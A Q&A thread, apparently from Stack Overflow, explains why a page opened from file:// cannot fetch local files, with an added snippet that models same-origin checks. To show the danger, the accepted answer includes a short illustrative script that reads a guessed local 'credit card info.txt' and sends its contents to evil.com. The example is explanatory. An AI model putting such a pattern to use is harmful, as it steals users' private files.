-2

I'm kind of new to web technologies, but this has been something that always confused me.

If I have an html file with a javascript file and text file in the same directory, why can't I just open the html file in my web browser (C:\somepath\index.html) and read the text file with a GET request from the javascript file?

If I throw those files on a web server (such as tomcat), it suddenly works. Why is that?

I know you can read local files with HTML5, but I am curious why you couldn't before.

Sorry if I'm using incorrect terminology.

SelfSurgery
  • 1
    This is not the place for this type of question. It is far too broad. – Anonymous Aug 31 '14 at 00:38
  • 2
    Ajax needs an [origin to validate](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy) and `file://` doesn't have one. "[Origin null is not allowed by Access-Control-Allow-Origin](http://stackoverflow.com/questions/8456538/origin-null-is-not-allowed-by-access-control-allow-origin)" – Jonathan Lonowski Aug 31 '14 at 00:39
  • @Anonymous Where would you recommend I get an answer to this question? I didn't know any of the key words (because I'm new) that Jonathan's link used so it was hard to find an answer. Most tutorials I find simply say "start tomcat" but don't explain why so I thought I would ask here. – SelfSurgery Aug 31 '14 at 01:04
  • @user3543405 You can look on http://stackexchange.com/sites and there *may* be a site more suitable. Or, you can significantly decrease how broad the question is. – Anonymous Aug 31 '14 at 01:18

1 Answer

3

First of all, an HTTP request looks like this:

```
GET / HTTP/1.1
Host: stackoverflow.com
… more headers …
```

It is received by a server, which can then decide to respond with anything. When your browser displays local pages, it doesn’t actually make any requests at all; there’s no server to receive them. It just special-cases the file: scheme and displays files.

As to why you can’t request other local files from a local file: that would be an enormous security issue. You can display other webpages from local files, so imagine: you save a webpage one day to open it later, and in it is:

```html
<script>
var rq = new XMLHttpRequest();
rq.open('GET', 'file:///C:\\Users\\some intelligent guess\\' +
               'Desktop\\credit card info.txt', false);
rq.send(null);
document.location = 'http://evil.com/save?data=' + encodeURIComponent(rq.responseText);
</script>
```

Easy theft. Reading local files with HTML5, on the other hand, is only possible when the user manually selects the files to be read using a file browsing dialogue. The webpage doesn’t have permission to read arbitrary files without interaction.

Ry-
  • thanks. I knew it was some sort of security issue, but I was wondering what made it "safer" in HTML5. – SelfSurgery Aug 31 '14 at 00:58
  • I think the important part here (in relation to your question) is to understand that GET and POST requests are actually _HTTP_ requests, and so require a HTTP server to understand and respond to them. – Steven Bakhtiari Aug 31 '14 at 01:10
  • @StevenBakhtiari Wow. That should have clicked a lot sooner for me than it did. – SelfSurgery Aug 31 '14 at 01:16
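
The origin check that the comments and the answer refer to, as an added example that is not part of the original thread: it uses the standard `URL` parser to show why a page opened from `file://` gets the origin `null`, while the same files served from a local server share one origin. The model assumes a browser that treats every `file:` URL as an opaque origin and does not model CORS opt-in; the function names and sample URLs are constructed for illustration.

```javascript
// Added example modelling the same-origin check discussed above.
// Assumption: every file: URL is an opaque origin (Chrome-style behaviour).
// Not modelled: a server opting in to cross-origin reads via CORS headers.

// An origin is (scheme, host, port). The WHATWG URL parser serializes
// opaque origins (file:, data:, ...) as the string "null".
function originOf(url) {
  return new URL(url).origin;
}

// Two opaque origins are never the same origin, even though both serialize
// to "null". Comparing the strings alone would wrongly treat any two
// file: documents as trusted peers.
function sameOrigin(a, b) {
  const oa = originOf(a);
  const ob = originOf(b);
  if (oa === 'null' || ob === 'null') return false;
  return oa === ob;
}

// Would script running on `pageUrl` be allowed to read `target`?
// Relative targets are resolved against the page, as the browser does.
function sameOriginRead(pageUrl, target) {
  const resolved = new URL(target, pageUrl).href;
  return {
    resolved,
    pageOrigin: originOf(pageUrl),
    allowed: sameOrigin(pageUrl, resolved),
  };
}

// Constructed sample URLs: the question's local page, then the same files
// served by a local server (hypothetical port 8080).
const cases = [
  ['file:///C:/somepath/index.html', 'data.txt'],
  ['http://localhost:8080/app/index.html', 'data.txt'],
  ['http://localhost:8080/app/index.html', 'file:///C:/somepath/data.txt'],
  ['http://localhost:8080/app/index.html', 'http://localhost:9090/data.txt'],
];
for (const [page, target] of cases) {
  const r = sameOriginRead(page, target);
  console.log(`${r.pageOrigin} -> ${r.resolved}: ${r.allowed ? 'allowed' : 'blocked'}`);
}
```

Only the second case is allowed: the page and the text file share scheme, host and port once a server hosts both.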